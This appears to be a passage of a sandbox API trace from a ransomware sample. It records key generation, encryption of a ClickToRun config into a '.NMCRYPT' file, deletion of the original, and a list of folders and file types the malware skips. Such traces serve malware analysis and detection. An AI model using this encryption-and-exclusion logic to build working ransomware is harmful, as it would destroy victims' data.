[0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.414] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3e40*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x28d3e40*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0143.415] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3f40*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x28d3f40*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0143.415] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x60d2a4 | out: phHash=0x60d2a4) returned 1 [0143.415] CryptHashData (hHash=0x8bdf78, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.415] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x8bdf78, dwFlags=0x4, phKey=0x60d2a8 | out: phKey=0x60d2a8*=0x8bdb78) returned 1 [0143.415] CryptSetKeyParam (hKey=0x8bdb78, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0143.415] CryptSetKeyParam (hKey=0x8bdb78, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0143.415] wcslen (_String="\\\\?\\") returned 0x4 [0143.415] CryptDuplicateKey (in: hKey=0x8bdb78, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x8bdbb8) returned 1 [0143.415] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0143.417] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a0 [0143.421] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=4136) returned 1 [0143.421] WriteFile (in: hFile=0x588, lpBuffer=0x28d3e40*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d3e40*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0143.422] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.423] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.423] GetLastError () returned 0x0 [0143.423] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.425] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.425] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.425] GetLastError () returned 0x0 [0143.425] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.425] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.425] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.425] GetLastError () returned 0x0 [0143.425] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.425] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.425] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.425] GetLastError () returned 0x0 [0143.425] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.425] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.426] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.426] GetLastError () returned 0x0 [0143.426] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.426] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.426] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.426] GetLastError () returned 0x0 [0143.426] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.426] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.426] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.426] GetLastError () returned 0x0 [0143.426] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.426] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.426] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.426] GetLastError () returned 0x0 [0143.426] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.426] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.426] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.426] GetLastError () returned 0x0 [0143.426] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.427] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.427] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.427] GetLastError () returned 0x0 [0143.427] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.427] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.427] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.427] GetLastError () returned 0x0 [0143.427] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.427] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.427] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.427] GetLastError () returned 0x0 [0143.427] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.427] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.427] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.427] GetLastError () returned 0x0 [0143.427] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.427] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.427] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.427] GetLastError () returned 0x0 [0143.427] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.427] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.428] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.428] GetLastError () returned 0x0 [0143.428] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.428] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.428] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.428] GetLastError () returned 0x0 [0143.428] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.428] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x28, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x28, lpOverlapped=0x0) returned 1 [0143.428] CryptEncrypt (in: hKey=0x8bdbb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x28, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x30) returned 1 [0143.428] GetLastError () returned 0x0 [0143.428] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x30, lpOverlapped=0x0) returned 1 [0143.428] ReadFile (in: hFile=0x5a0, lpBuffer=0x607978, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0143.428] WriteFile (in: hFile=0x588, lpBuffer=0x607978*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x607978*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0143.428] CloseHandle (hObject=0x5a0) returned 1 [0143.428] CloseHandle (hObject=0x588) returned 1 [0143.429] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml")) returned 0x20 [0143.429] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml", dwFileAttributes=0x20) returned 1 [0143.429] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 1 [0143.429] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml")) returned 1 [0143.430] CryptDestroyKey (hKey=0x8bdbb8) returned 1 [0143.430] wcslen (_String="OK") returned 0x2 [0143.430] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.430] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.430] CryptDestroyKey (hKey=0x8bdb78) returned 1 [0143.430] CryptDestroyHash (hHash=0x8bdf78) returned 1 [0143.430] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0143.430] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.430] PathMatchSpecW (pszFile="C2RUI.en-us.dll", pszSpec="*NMCRYPT") returned 0 [0143.430] PathMatchSpecW (pszFile="C2RUI.en-us.dll", pszSpec="*Recovers your files.html") returned 0 [0143.430] PathMatchSpecW (pszFile="C2RUI.en-us.dll", pszSpec="*.exe") returned 0 [0143.430] PathMatchSpecW (pszFile="C2RUI.en-us.dll", pszSpec="*.dll") returned 1 [0143.430] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0143.430] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*NMCRYPT") returned 0 [0143.430] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*Recovers your files.html") returned 0 [0143.430] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*.exe") returned 0 [0143.430] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*.dll") returned 0 [0143.430] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*.lnk") returned 0 [0143.430] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*.bat") returned 0 [0143.430] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*.ini") returned 0 [0143.430] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*.msi") returned 0 [0143.430] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*.scf") returned 0 [0143.430] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*pagefile.sys*") returned 0 [0143.430] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*NTUSER.DAT*") returned 0 [0143.430] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*AppData*") returned 0 [0143.430] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*\\winrar\\*") returned 0 [0143.430] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*\\java\\*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*\\TeamViewer\\*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*\\windows\\*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*\\ESET\\*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*\\AVG\\*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*\\AVIRA\\*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*\\AVAST Software\\*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*Atheros*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*Realtek*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*bootmgr*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*boot*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*boot*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*CONFIG.SYS*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*IO.SYS*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*MSDOS.SYS*") returned 0 [0143.431] PathMatchSpecW (pszFile="ClientCapabilities.json", pszSpec="*NTDETECT.COM*") 